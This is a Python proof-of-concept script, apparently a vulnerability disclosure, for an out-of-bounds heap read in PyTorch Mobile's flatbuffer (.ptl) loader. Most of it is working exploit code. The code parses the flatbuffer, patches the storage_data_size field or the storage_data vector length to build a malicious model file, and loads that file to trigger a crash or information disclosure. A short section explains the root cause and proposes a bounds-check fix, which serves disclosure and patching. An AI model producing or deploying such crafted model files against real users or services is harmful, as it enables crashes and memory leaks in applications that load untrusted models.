poc-pytorch-flatbuf-storage / poc_flatbuf_storage_oob.py
0xiviel's picture
Upload folder using huggingface_hub
90bbdc6 verified
#!/usr/bin/env python3
"""
PoC: Flatbuffer Storage Vector OOB Read in PyTorch Mobile (.ptl)
Vulnerability: The flatbuffer loader's getStorage() method at
flatbuffer_loader.cpp:696-700 checks `index < storage_loaded_.size()` and
`index < storages_.size()`, but both vectors are sized from
`module->storage_data_size()` β€” an integer field in the flatbuffer schema
that is INDEPENDENT of the actual `storage_data()` vector.
A crafted .ptl file can set `storage_data_size` larger than the actual
`storage_data` vector length, then reference storage indices that pass the
bounds check but are OOB on the real vector. GetMutableObject(index) on the
flatbuffer vector reads past its bounds, interpreting random flatbuffer data
as a StorageData table β†’ heap OOB read, crash, or information disclosure.
Root cause:
- flatbuffer_loader.cpp:306-307 β€” storages_ sized from storage_data_size (int field)
- flatbuffer_loader.cpp:697-698 β€” bounds check against storages_.size()
- flatbuffer_loader.cpp:700 β€” actual access on storage_data() (the real vector)
- NO check that storage_data_size <= storage_data()->size()
Tested: PyTorch 2.10.0+cpu on Python 3.13.11
"""
import io
import os
import struct
import subprocess
import sys
import tempfile
import warnings
import torch
import torch.nn as nn
warnings.filterwarnings('ignore')
def create_valid_flatbuffer_ptl(output_path):
"""Create a valid .ptl flatbuffer model using PyTorch's serializer."""
model = torch.jit.script(nn.Linear(4, 2))
model._save_for_lite_interpreter(output_path, _use_flatbuffer=True)
return output_path
def analyze_flatbuffer(data):
"""Parse flatbuffer structure and return key offsets."""
info = {}
# Root table
root_offset = struct.unpack_from('<I', data, 0)[0]
info['root_table_pos'] = root_offset
# VTable
vtable_soffset = struct.unpack_from('<i', data, root_offset)[0]
vtable_pos = root_offset - vtable_soffset
info['vtable_pos'] = vtable_pos
# storage_data_size field (VT_STORAGE_DATA_SIZE = 14, vtable index 5)
sds_field_off = struct.unpack_from('<H', data, vtable_pos + 14)[0]
if sds_field_off:
info['storage_data_size_pos'] = root_offset + sds_field_off
info['storage_data_size_val'] = struct.unpack_from(
'<i', data, info['storage_data_size_pos']
)[0]
# storage_data vector (VT_STORAGE_DATA = 16, vtable index 6)
sd_field_off = struct.unpack_from('<H', data, vtable_pos + 16)[0]
if sd_field_off:
sd_offset_pos = root_offset + sd_field_off
sd_rel = struct.unpack_from('<I', data, sd_offset_pos)[0]
sd_vec_pos = sd_offset_pos + sd_rel
sd_vec_len = struct.unpack_from('<I', data, sd_vec_pos)[0]
info['storage_data_vec_pos'] = sd_vec_pos
info['storage_data_vec_len'] = sd_vec_len
# Find TensorMetadata ivalues and their storage_location_index
ivalues_field_off = struct.unpack_from('<H', data, vtable_pos + 12)[0]
if ivalues_field_off:
iv_offset_pos = root_offset + ivalues_field_off
iv_rel = struct.unpack_from('<I', data, iv_offset_pos)[0]
iv_vec_pos = iv_offset_pos + iv_rel
iv_count = struct.unpack_from('<I', data, iv_vec_pos)[0]
info['ivalues_count'] = iv_count
info['tensor_metadata'] = []
for i in range(iv_count):
offset_pos = iv_vec_pos + 4 + i * 4
rel = struct.unpack_from('<I', data, offset_pos)[0]
ival_pos = offset_pos + rel
# Read IValue vtable
iv_vt_soff = struct.unpack_from('<i', data, ival_pos)[0]
iv_vt = ival_pos - iv_vt_soff
iv_vt_size = struct.unpack_from('<H', data, iv_vt)[0]
iv_num_fields = (iv_vt_size - 4) // 2
# val_type (VT=4, field 0) β€” uint8
val_type = None
if iv_num_fields >= 1:
ft_off = struct.unpack_from('<H', data, iv_vt + 4)[0]
if ft_off:
val_type = data[ival_pos + ft_off]
# If TensorMetadata (type 5), find storage_location_index
if val_type == 5:
# val data (VT=6, field 1) β€” offset to union data
fv_off = struct.unpack_from('<H', data, iv_vt + 6)[0]
if fv_off:
val_rel = struct.unpack_from('<I', data, ival_pos + fv_off)[0]
tm_pos = ival_pos + fv_off + val_rel
# TensorMetadata vtable
tm_vt_soff = struct.unpack_from('<i', data, tm_pos)[0]
tm_vt = tm_pos - tm_vt_soff
tm_vt_size = struct.unpack_from('<H', data, tm_vt)[0]
tm_num_fields = (tm_vt_size - 4) // 2
# storage_location_index (VT=4, field 0) β€” uint32
sli_val = 0 # default
sli_pos = None
if tm_num_fields >= 1:
sli_off = struct.unpack_from('<H', data, tm_vt + 4)[0]
if sli_off:
sli_pos = tm_pos + sli_off
sli_val = struct.unpack_from(
'<I', data, sli_pos
)[0]
info['tensor_metadata'].append({
'ivalue_index': i,
'tm_pos': tm_pos,
'storage_location_index': sli_val,
'sli_byte_pos': sli_pos,
})
return info
def create_malicious_ptl(input_path, output_path, oob_index=5):
"""Modify a valid .ptl flatbuffer to trigger storage vector OOB read.
Strategy:
1. Inflate storage_data_size to be larger than actual storage_data vector
2. Modify a tensor's storage_location_index to reference an OOB index
3. The loader's getStorage() passes bounds check but OOB on real vector
"""
with open(input_path, 'rb') as f:
data = bytearray(f.read())
info = analyze_flatbuffer(data)
orig_sds = info['storage_data_size_val']
orig_vec_len = info['storage_data_vec_len']
tensors = info['tensor_metadata']
print(f" Original storage_data_size: {orig_sds}")
print(f" Actual storage_data vector length: {orig_vec_len}")
print(f" TensorMetadata entries: {len(tensors)}")
for tm in tensors:
print(f" ivalue[{tm['ivalue_index']}]: "
f"storage_location_index={tm['storage_location_index']}"
f" (byte {tm['sli_byte_pos']})")
print()
# Step 1: Inflate storage_data_size
new_sds = oob_index + 5 # ensure oob_index < new_sds
sds_pos = info['storage_data_size_pos']
struct.pack_into('<i', data, sds_pos, new_sds)
print(f" [*] Changed storage_data_size: {orig_sds} β†’ {new_sds} "
f"(at byte {sds_pos})")
# Step 2: Find a tensor with an explicit storage_location_index and change it
# to oob_index
target_tm = None
for tm in tensors:
if tm['sli_byte_pos'] is not None:
target_tm = tm
break
if target_tm is None:
# All tensors use default (0). We need to modify the one that has sli=0
# but since it's defaulted (not written), we need a different approach.
# Instead, shrink storage_data vector length below the used indices.
print(" [*] No explicit storage_location_index found.")
print(" [*] Alternative: reduce storage_data vector length to 0")
print(f" storage_data vector at byte {info['storage_data_vec_pos']}")
# Set vector length to 0 β€” all indices become OOB
vec_pos = info['storage_data_vec_pos']
struct.pack_into('<I', data, vec_pos, 0)
# Reset storage_data_size back to original for the bounds check
struct.pack_into('<i', data, sds_pos, orig_sds)
print(f" [*] Set storage_data vector length: {orig_vec_len} β†’ 0")
print(f" [*] storage_data_size remains {orig_sds}")
print()
print(f" Result: getStorage(0) passes bounds check (0 < {orig_sds})")
print(f" but storage_data()->GetMutableObject(0) is OOB "
f"(vector length = 0)")
else:
orig_sli = target_tm['storage_location_index']
sli_pos = target_tm['sli_byte_pos']
struct.pack_into('<I', data, sli_pos, oob_index)
print(f" [*] Changed ivalue[{target_tm['ivalue_index']}] "
f"storage_location_index: {orig_sli} β†’ {oob_index} "
f"(at byte {sli_pos})")
print()
print(f" Result: getStorage({oob_index}) passes bounds check "
f"({oob_index} < {new_sds})")
print(f" but storage_data()->GetMutableObject({oob_index}) is OOB "
f"(vector length = {orig_vec_len})")
with open(output_path, 'wb') as f:
f.write(data)
print(f"\n Saved: {output_path} ({len(data)} bytes)")
return output_path
def demonstrate_vulnerability():
"""Show the vulnerability: mismatch between storage_data_size and
actual storage_data vector causes OOB in getStorage()."""
print()
print("=" * 70)
print(" Part 1: Vulnerability Demonstration")
print("=" * 70)
print()
# Create valid model
tmpdir = tempfile.mkdtemp(prefix="ptl_")
valid_path = os.path.join(tmpdir, "valid.ptl")
create_valid_flatbuffer_ptl(valid_path)
# First verify the valid model loads fine
print(" Step 1: Verify valid .ptl loads correctly")
try:
m = torch.jit.load(valid_path)
print(f" [+] Valid model loaded: {type(m)}")
del m
except Exception as e:
print(f" [-] Valid model failed: {e}")
return False
print()
print(" Step 2: Create malicious .ptl with inflated storage_data_size")
print()
malicious_path = os.path.join(tmpdir, "malicious.ptl")
create_malicious_ptl(valid_path, malicious_path, oob_index=5)
print()
print(" Step 3: Load malicious .ptl β†’ OOB read in getStorage()")
print()
# Load in subprocess to capture crash
poc_script = f'''
import torch, sys, warnings, signal
warnings.filterwarnings('ignore')
signal.alarm(5)
try:
m = torch.jit.load("{malicious_path}")
print("MODEL_LOADED")
# Try accessing the model
try:
result = m.forward(torch.randn(1, 4))
print(f"FORWARD_OK: {{result}}")
except Exception as e:
print(f"FORWARD_ERROR: {{type(e).__name__}}: {{e}}")
except RuntimeError as e:
err = str(e)
if "storage" in err.lower() or "corrupt" in err.lower() or "invalid" in err.lower():
print(f"RUNTIME_ERROR: {{err[:200]}}")
else:
print(f"RUNTIME_ERROR: {{err[:200]}}")
except Exception as e:
print(f"ERROR: {{type(e).__name__}}: {{str(e)[:200]}}")
'''
result = subprocess.run(
[sys.executable, '-c', poc_script],
capture_output=True, text=True, timeout=10
)
stdout = result.stdout.strip()
stderr = result.stderr.strip()
retcode = result.returncode
print(f" Return code: {retcode}")
if stdout:
print(f" Stdout: {stdout[:300]}")
if stderr:
for line in stderr.strip().split('\n')[:5]:
print(f" Stderr: {line[:200]}")
if retcode < 0:
signum = -retcode
try:
import signal as sig
signame = sig.Signals(signum).name
except (ValueError, AttributeError):
signame = f"signal {signum}"
print(f"\n [+] CRASH: Process killed by {signame} (signal {signum})")
print(f" [+] OOB read in storage_data vector caused {signame}")
return True
elif "RUNTIME_ERROR" in stdout:
print(f"\n [+] RuntimeError from corrupted flatbuffer data")
return True
elif "MODEL_LOADED" in stdout:
print(f"\n [!] Model loaded (OOB read happened silently)")
return True
else:
print(f"\n [-] Unexpected result")
return False
def demonstrate_alternative_attack():
"""Alternative: shrink storage_data vector length instead."""
print()
print("=" * 70)
print(" Part 2: Alternative β€” Shrink storage_data vector length")
print("=" * 70)
print()
tmpdir = tempfile.mkdtemp(prefix="ptl2_")
valid_path = os.path.join(tmpdir, "valid.ptl")
create_valid_flatbuffer_ptl(valid_path)
with open(valid_path, 'rb') as f:
data = bytearray(f.read())
info = analyze_flatbuffer(data)
vec_pos = info['storage_data_vec_pos']
orig_len = info['storage_data_vec_len']
sds = info['storage_data_size_val']
print(f" storage_data_size (int field): {sds}")
print(f" storage_data vector length: {orig_len}")
print(f" storage_data vector at byte: {vec_pos}")
print()
# Set vector length to 0 but keep storage_data_size at 2
struct.pack_into('<I', data, vec_pos, 0)
print(f" [*] Set storage_data vector length: {orig_len} β†’ 0")
print(f" [*] storage_data_size remains: {sds}")
print()
print(f" getStorage(0): passes bounds check (0 < {sds})")
print(f" storage_data()->GetMutableObject(0): OOB! vector length = 0")
print()
malicious_path = os.path.join(tmpdir, "malicious_shrunk.ptl")
with open(malicious_path, 'wb') as f:
f.write(data)
print(f" Saved: {malicious_path}")
print()
# Load in subprocess
poc_script = f'''
import torch, sys, warnings, signal
warnings.filterwarnings('ignore')
signal.alarm(5)
try:
m = torch.jit.load("{malicious_path}")
print("MODEL_LOADED")
except RuntimeError as e:
print(f"RUNTIME_ERROR: {{str(e)[:200]}}")
except Exception as e:
print(f"ERROR: {{type(e).__name__}}: {{str(e)[:200]}}")
'''
result = subprocess.run(
[sys.executable, '-c', poc_script],
capture_output=True, text=True, timeout=10
)
stdout = result.stdout.strip()
stderr = result.stderr.strip()
retcode = result.returncode
print(f" Return code: {retcode}")
if stdout:
print(f" Stdout: {stdout[:300]}")
if stderr:
for line in stderr.strip().split('\n')[:5]:
print(f" Stderr: {line[:200]}")
if retcode < 0:
signum = -retcode
try:
import signal as sig
signame = sig.Signals(signum).name
except (ValueError, AttributeError):
signame = f"signal {signum}"
print(f"\n [+] CRASH: Process killed by {signame}")
return True
elif "RUNTIME_ERROR" in stdout or "ERROR" in stdout:
print(f"\n [+] Error from corrupted flatbuffer data")
return True
else:
return False
def demonstrate_vulnerability_details():
"""Show the vulnerable code pattern."""
print()
print("=" * 70)
print(" Part 3: Vulnerability Details")
print("=" * 70)
print()
print(" The flatbuffer schema has TWO independent fields (mobile_bytecode.fbs):")
print()
print(" table Module {")
print(" storage_data_size:int; // integer field (line 205)")
print(" storage_data:[StorageData]; // actual vector (line 206)")
print(" }")
print()
print(" In parseModule() (flatbuffer_loader.cpp:306-307):")
print(" storages_.resize(module->storage_data_size()); // uses INT field")
print(" storage_loaded_.resize(module->storage_data_size(), false);")
print()
print(" In getStorage() (flatbuffer_loader.cpp:696-700):")
print(" TORCH_CHECK(index < storage_loaded_.size()); // checks INT field")
print(" TORCH_CHECK(index < storages_.size()); // checks INT field")
print(" if (!storage_loaded_[index]) {")
print(" auto* storage = module_->storage_data() // accesses REAL vector!")
print(" ->GetMutableObject(index); // OOB!")
print()
print(" The loader NEVER validates:")
print(" storage_data_size <= storage_data()->size()")
print()
print(" FIX: Add validation in parseModule():")
print(" ─────────────────────────────────────────────────────────")
print(" TORCH_CHECK(")
print(" module->storage_data() &&")
print(" module->storage_data_size() <=")
print(" static_cast<int>(module->storage_data()->size()),")
print(' "storage_data_size exceeds actual storage_data vector");')
print()
def main():
print()
print(" PoC: Flatbuffer Storage Vector OOB Read (.ptl)")
print(f" PyTorch {torch.__version__}, Python {sys.version.split()[0]}")
print()
ok1 = demonstrate_vulnerability()
ok2 = demonstrate_alternative_attack()
demonstrate_vulnerability_details()
# Summary
print("=" * 70)
print(" RESULTS:")
if ok1:
print(" [+] Inflated storage_data_size: OOB on storage_data vector")
if ok2:
print(" [+] Shrunk storage_data vector: OOB on GetMutableObject()")
print(" [+] Root cause: no validation that storage_data_size <=")
print(" storage_data()->size() in flatbuffer_loader.cpp")
print(" [+] Affects: PyTorch Mobile (.ptl flatbuffer format)")
print(" [+] Fix: validate storage_data_size against actual vector length")
print("=" * 70)
if __name__ == "__main__":
main()